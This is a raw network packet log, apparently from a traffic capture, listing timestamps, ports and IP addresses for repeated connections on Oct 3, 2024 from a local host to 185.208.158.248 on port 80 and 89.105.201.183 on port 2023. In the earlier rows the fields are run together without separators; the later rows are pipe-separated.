                                                                                                    Oct 3, 2024 08:40:15.783653021 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.783700943 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.783762932 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.788598061 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.468743086 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.468812943 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.590228081 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.590631008 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.595530987 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.595562935 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.595612049 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.595673084 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.595844984 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.600610971 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.286511898 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.286664963 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.403004885 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.403389931 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.408138990 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.408217907 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.408293962 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.408360004 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.408485889 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.413253069 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.087939978 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.088016987 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.199320078 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.204370975 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.438894033 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.439018965 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.558984041 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.559343100 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.564222097 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.564248085 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.564344883 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.564426899 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.564563990 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.569331884 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.251231909 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.251332045 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.371915102 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.372356892 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.377082109 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.377108097 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.377135038 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.377171040 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.377352953 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.382122993 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.057390928 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.057528019 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.168422937 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.173327923 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.409823895 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.409919977 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.530644894 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.531263113 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.535841942 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.535897970 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.536178112 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.536245108 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.536375999 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.541132927 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:21.226202011 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:21.226324081 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.340394974 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.340809107 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.345733881 CEST8049734185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:21.345746040 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:21.345841885 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.345854044 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.346004009 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.350894928 CEST8049734185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:22.025324106 CEST8049734185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:22.025544882 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:22.137379885 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:22.142276049 CEST8049734185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:22.376693010 CEST8049734185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:22.376750946 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:22.497220993 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.501708031 CEST8049751185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:40.731971025 CEST8049751185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:40.732228041 CEST4975180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.855690002 CEST4975180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.856018066 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.860922098 CEST8049752185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:40.860945940 CEST8049751185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:40.861000061 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.861021996 CEST4975180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.861183882 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:40.866100073 CEST8049752185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:41.558625937 CEST8049752185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:41.558713913 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:41.671484947 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:41.676549911 CEST8049752185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:41.907891035 CEST8049752185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:41.908030987 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:42.030041933 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:42.030492067 CEST4975380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:42.208998919 CEST8049753185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:42.209022045 CEST8049752185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:42.209135056 CEST4975280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:42.209151983 CEST4975380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:42.209418058 CEST4975380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:42.214154959 CEST8049753185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:42.892733097 CEST8049753185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:42.893022060 CEST4975380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.012147903 CEST4975380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.012523890 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.018444061 CEST8049754185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:43.018548965 CEST8049753185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:43.018584967 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.018601894 CEST4975380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.018748999 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.024734974 CEST8049754185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:43.712949991 CEST8049754185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:43.713226080 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.826062918 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:43.831150055 CEST8049754185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:44.063143969 CEST8049754185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:44.063249111 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:44.185321093 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:44.185724974 CEST4975580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:44.190737963 CEST8049755185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:44.190781116 CEST8049754185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:44.190839052 CEST4975580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:44.190864086 CEST4975480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:44.191057920 CEST4975580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:44.195930004 CEST8049755185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:44.974131107 CEST8049755185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:44.974334002 CEST4975580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:45.363857985 CEST4975580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:45.364228010 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:45.494971991 CEST8049756185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:45.495151997 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:45.495341063 CEST8049755185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:45.495400906 CEST4975580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:45.495464087 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:45.500283957 CEST8049756185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:46.182421923 CEST8049756185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:46.182574987 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.294872999 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.299890995 CEST8049756185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:46.530219078 CEST8049756185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:46.530399084 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.654266119 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.654625893 CEST4975780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.659581900 CEST8049757185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:46.659703016 CEST4975780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.659794092 CEST4975780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.659804106 CEST8049756185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:46.659869909 CEST4975680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:46.664622068 CEST8049757185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:47.354055882 CEST8049757185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:47.354127884 CEST4975780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:47.496732950 CEST4975780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:47.497081041 CEST4975880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:47.501955032 CEST8049757185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:47.502026081 CEST8049758185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:47.502041101 CEST4975780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:47.502093077 CEST4975880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:47.502206087 CEST4975880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:47.507040977 CEST8049758185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:48.187638044 CEST8049758185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:48.187717915 CEST4975880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:48.356457949 CEST4975880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:48.356820107 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:48.361581087 CEST8049759185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:48.361699104 CEST8049758185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:48.361732960 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:48.361776114 CEST4975880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:48.361952066 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:48.366674900 CEST8049759185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:49.043767929 CEST8049759185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:49.043864012 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.153165102 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.158205032 CEST8049759185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:49.395987988 CEST8049759185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:49.396092892 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.512240887 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.512567997 CEST4976080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.517505884 CEST8049760185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:49.517575979 CEST8049759185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:49.517605066 CEST4976080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.517632008 CEST4975980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.517812014 CEST4976080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:49.522628069 CEST8049760185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.227657080 CEST8049760185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.227981091 CEST4976080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:50.340852022 CEST4976080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:50.341286898 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:50.346270084 CEST8049760185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.346308947 CEST8049761185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.346354961 CEST4976080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:50.346420050 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:50.346549034 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:50.351824045 CEST8049761185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.383018017 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.397317886 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:50.402353048 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.402429104 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:50.402473927 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:50.407485962 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.407553911 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:50.412512064 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.431720972 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:51.027204990 CEST8049761185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.027288914 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.137662888 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.142668962 CEST8049761185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.252825975 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.306680918 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:51.380590916 CEST8049761185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.381067038 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.501590014 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.501916885 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.507910967 CEST8049764185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.507957935 CEST8049761185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.508089066 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.508131981 CEST4976180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.508207083 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:51.512985945 CEST8049764185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.843673944 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:51.848711014 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.848747969 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.848773956 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:51.848805904 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.430325031 CEST8049764185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.430349112 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.430481911 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.430548906 CEST8049764185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.430613041 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.431472063 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:52.436300039 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.544213057 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.549469948 CEST8049764185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.552283049 CEST4976480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.553009987 CEST4976580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.557837963 CEST8049765185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.558017969 CEST4976580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.558202982 CEST4976580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:52.562987089 CEST8049765185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.840167046 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:52.884736061 CEST497632023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:53.068140030 CEST20234976389.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:53.119057894 CEST497632023192.168.2.589.105.201.183
Oct 3, 2024 08:40:53.253561020 CEST | 80 | 49765 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:53.253640890 CEST | 49765 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:53.371773958 CEST | 49765 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:53.372102976 CEST | 49766 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:53.377001047 CEST | 80 | 49766 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:53.377032042 CEST | 80 | 49765 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:53.377095938 CEST | 49766 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:53.377124071 CEST | 49765 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:53.377336979 CEST | 49766 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:53.382189035 CEST | 80 | 49766 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:53.613321066 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.613356113 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.614048958 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.615092039 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.618268967 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.618365049 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.618376017 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.622888088 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.622944117 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.622987986 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623016119 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623064041 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623090029 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623136997 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623162985 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623193026 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623234987 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623281956 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623307943 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623333931 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.623359919 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.703658104 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.704451084 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.705948114 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.706902027 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.708586931 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.708645105 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.708672047 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.708864927 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.708945036 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.709464073 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.709491014 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.709521055 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.712730885 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713263035 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713311911 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713339090 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713392019 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713440895 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713466883 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713495970 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.713521957 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.776665926 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.776729107 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.781538010 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.781713009 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.781739950 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.781770945 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.794228077 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.794279099 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.795057058 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
